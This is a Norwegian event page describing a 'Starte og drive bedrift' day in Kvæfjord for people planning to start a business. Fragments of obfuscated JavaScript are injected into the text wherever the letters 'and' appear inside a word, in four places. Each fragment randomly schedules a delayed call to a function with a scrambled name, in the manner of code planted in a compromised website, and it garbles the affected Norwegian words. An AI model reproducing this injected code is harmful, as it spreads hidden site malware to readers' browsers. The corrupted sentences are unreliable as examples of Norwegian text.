Starte og drive bedrift-dagen

12804666_10153544686194397_1297175211745556272_n

Starte og drive bedrift-dagen i Kvæfjord. Arrangementet er et samarbeid mellom Kvæfjord kommune, Harstad kommune og Brønnøysundregisterene. Ellen Eliseussen fra Kvæfjord kommune og Bjørn Akselsen fra Harstad kommune forteller om lokal gründerhjelp i regionen.

Tema for dagen:
Lære hva som skal til for å starte egen bedrift

  • Mange foredrag og gode tips for å få en god oppstart
  • Møte en nystarter som forteller om sine erfaringer
  • Få inspirasjon til å våge og ta steget
  • Utvide ditt nettverk og treffe andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre som tenker å starte egen bedrift
  • Mye nyttig informasjon også for de som nylig har etablert egen bedrift
  • Treffe foredragsholdere og utstillere som kan hjelpe deg i den fasen du er i, på standom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and eller personlige møter

Slik var opplegget:
Det handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andler om én dag, mange korte innlegg, tid til mingling og prat med likesinnede og med tjenesteleverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andører, pluss en enkel lunsj. Meningen er at du som tenker å etablere bedrift skal få så mye relevant informasjon som mulig i kortform. Selvfølgelig lærer du ikke hele prosessen på én dag, men du skal få nok info til å vite det viktigste, hva du bør se nærmere på og hvem du kan kontakte. Også relativt nystartede foretak kan ha stort utbytte av dette. Det viser tilbakemeldingene vi har fått etter flere tilsvarende arrangementer.

Er du interessert i flere slike arrangement? Ta gjerne kontakt med Ellen Eliseussen eller Bjørn Akselsen for mer informasjon.

Starte og drive bedrift-dagen er på initiativ fra Brønnøysundregistrene.